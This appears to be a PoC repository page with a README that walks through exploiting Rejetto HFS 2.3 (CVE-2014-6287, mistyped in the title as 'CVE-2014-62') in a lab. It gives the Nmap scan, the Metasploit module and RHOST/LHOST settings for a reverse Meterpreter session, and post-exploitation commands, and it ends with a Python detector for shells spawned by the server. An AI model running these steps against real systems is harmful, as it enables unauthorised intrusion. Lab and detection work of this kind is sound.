PoC details: a8ada9dc1f99b4da259d8eb39a09cd54067ed354

Description
Metasploit RCE on HFS 2.3 - CVE-2014-62
Introduction
# HFS_EXPLOIT_PROJECT
Metasploit RCE on HFS 2.3 - CVE-2014-62




🔖 Title of the Project

    > Remote Code Execution via HTTP File Server (HFS 2.3)


⚙ Tools Used
	• Kali Linux
	• Nmap
	• Metasploit
	• Target: HFS 2.3 on Windows 7


 
🔐 Vulnerability Details
	• Name: CVE-2014-6287
	• Type: Remote Code Execution
	• Cause: Unvalidated input in HFS scripting
	• Impact: Unauthenticated shell access



🔍 Methodology (Step-by-Step)

🔹 Step 1: Information Gathering (Nmap)

	•    nmap -sV demo.ine.local (or the IP of the target)
	•    Open port found: 80
	•    Service: Rejetto HTTP File Server 2.3

## Nmap Scan
![Nmap](screenshots/nmap.png)


  
🔹 Step 2: Exploitation (Metasploit)

	• msfconsole
	• Search for HFS or rejetto
	• use exploit/windows/http/rejetto_hfs_exec
	• set RHOST 192.168.1.100
	• set RPORT 80
	• set LHOST 192.168.1.101
	• run

## Exploit Setup
![Exploit](screenshots/msf.png)
![Exploit](screenshots/searchhfs.png)
    

🔹 Step 3: Post-Exploitation

After run, you will get a Meterpreter session.
Use the command: shell

Then, in the shell:

	• whoami
	• ipconfig
	• dir

## Shell Access
![Shell](screenshots/whoami.png)

![Shell](screenshots/ipconfig.png)
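
What Step 3 looks like from the defender's side, as an added example (not part of the original README or of Metasploit): a file server process that suddenly has a shell and discovery commands underneath it. The sketch walks process-creation events and flags everything descending from the server; the `hfs.exe` image name, the field names and the sample events are assumptions constructed for illustration.

```python
import ntpath

# Assumption: the HFS server process is named hfs.exe; change to match the host.
SERVER_IMAGE = "hfs.exe"
# Shells/script hosts, and the discovery commands listed in Step 3.
# ("dir" is a cmd.exe builtin, so it never appears as its own process event.)
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
DISCOVERY = {"whoami.exe", "ipconfig.exe"}

# Constructed process-creation events (Sysmon Event ID 1 style), oldest first.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 800, "image": r"C:\Windows\explorer.exe"},
    {"pid": 2044, "ppid": 1200, "image": r"C:\Users\admin\Desktop\hfs.exe"},
    {"pid": 3100, "ppid": 2044, "image": r"C:\Windows\System32\wscript.exe"},
    {"pid": 3188, "ppid": 3100, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 3240, "ppid": 3188, "image": r"C:\Windows\System32\whoami.exe"},
    {"pid": 3260, "ppid": 3188, "image": r"C:\Windows\System32\ipconfig.exe"},
    {"pid": 4000, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 4010, "ppid": 4000, "image": r"C:\Windows\System32\ipconfig.exe"},
]

def detect(events):
    """Flag every process that descends from the file server process."""
    lineage = {}  # pid -> image names from the server down to this process
    alerts = []
    for ev in events:
        name = ntpath.basename(ev["image"]).lower()
        if name == SERVER_IMAGE:
            lineage[ev["pid"]] = [name]
            continue
        parent_chain = lineage.get(ev["ppid"])
        if parent_chain is None:
            lineage.pop(ev["pid"], None)  # PID reused by an unrelated process
            continue
        chain = parent_chain + [name]
        lineage[ev["pid"]] = chain
        # A file server has no reason to start child processes at all;
        # shells and discovery tools underneath it are the strongest signal.
        severity = "high" if name in SHELLS | DISCOVERY else "medium"
        alerts.append((ev["pid"], severity, " > ".join(chain)))
    return alerts

if __name__ == "__main__":
    for pid, severity, chain in detect(SAMPLE_EVENTS):
        print(f"[{severity}] pid={pid} {chain}")
```

The same `ipconfig` run from an interactive `cmd.exe` under `explorer.exe` (PIDs 4000 and 4010 in the sample) is not flagged, because only the lineage back to the server process matters.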




File snapshot

[4.0K] /data/pocs/a8ada9dc1f99b4da259d8eb39a09cd54067ed354
├── [1.2K] README.md
└── [4.0K] screenshots
    ├── [207K] ipconfig.png
    ├── [460K] msf.png
    ├── [806K] nmap.png
    ├── [188K] search hts.png
    ├── [188K] serach hfs.png
    └── [173K] whoami.png

1 directory, 7 files